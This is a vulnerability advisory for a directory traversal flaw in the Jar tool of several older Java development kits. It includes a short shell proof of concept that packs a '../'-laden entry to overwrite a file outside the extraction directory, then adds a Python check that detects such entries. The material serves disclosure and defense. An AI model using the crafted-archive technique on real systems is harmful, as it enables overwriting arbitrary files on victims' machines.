‘Jar Tool Directory Traversal Vulnerability’

Summary

‘Jar is "a Java archiving and compression application, which is part of many Java development kits. It was designed mainly to facilitate the packaging of Java applets or applications into a single archive".

The Jar tool does not properly check whether the files to be extracted have the string ‘../’ in their names, so it’s possible for an attacker to create a malicious jar file in order to overwrite arbitrary files within the file system.’

Credit:

‘The information has been provided by Pluf.’


Details

Affected Software:
The following Java development kits have been tested and contain the vulnerability; other kits and/or platforms may be affected as well:
 * SUN:
    Sun’s J2SE Development Kit 1.5.0 (Solaris, Windows and Linux version)
    Sun’s J2SE Development Kit 1.4.2 (Solaris, Windows and Linux version)

 * IBM:
    IBM Java Development Kit 1.4.2 Linux

 * BEA:
    BEA WebLogic’s J2SE Development Kit, version 1.5.0 (Linux and Windows version)

 * BLACKDOWN:
    Blackdown Java Development Kit 1.4.2 Linux

Exploit:
A malicious jar file can be created as follows:

java4fun# echo hi > /tmp/test
java4fun# jar cvf trash.jar *.class ../../../../../../../tmp/test
java4fun# rm /tmp/test
java4fun# jar xvf trash.jar (no overwrite message displayed)
java4fun# cat /tmp/test
hi
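
A pre-extraction check for entry names like the one in the session above, as an added example that is not part of the original advisory or of any JDK. The function names are illustrative, and the sample archive is constructed in memory and never extracted.

```python
import io
import posixpath
import zipfile


def escapes_destination(name: str) -> bool:
    """True if an archive entry name would resolve outside the extraction dir."""
    # Jar/zip entry names use '/' separators; treat '\\' the same way so a
    # Windows extractor is covered too.
    normalized = posixpath.normpath(name.replace("\\", "/"))
    return (
        normalized.startswith("/")          # absolute path
        or normalized == ".."
        or normalized.startswith("../")     # climbs above the destination
        or (len(normalized) > 1 and normalized[1] == ":")  # drive letter
    )


def unsafe_entries(jar) -> list[str]:
    """Return the entry names in a jar (path or file object) that escape."""
    with zipfile.ZipFile(jar) as zf:
        return [n for n in zf.namelist() if escapes_destination(n)]


def build_sample_jar() -> io.BytesIO:
    """Constructed sample: in-memory archive shaped like the advisory's trash.jar."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr("Hello.class", b"\xca\xfe\xba\xbe")
        zf.writestr("lib/../Helper.class", b"\xca\xfe\xba\xbe")  # stays inside
        zf.writestr("../../../../../../../tmp/test", "hi\n")
    buf.seek(0)
    return buf


if __name__ == "__main__":
    # List the entries an extractor should refuse before running `jar xvf`.
    for name in unsafe_entries(build_sample_jar()):
        print("refusing to extract:", name)
```

Running the same check on a downloaded jar before `jar xvf` flags entries that resolve outside the working directory, while names such as `lib/../Helper.class` that stay inside it are allowed.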
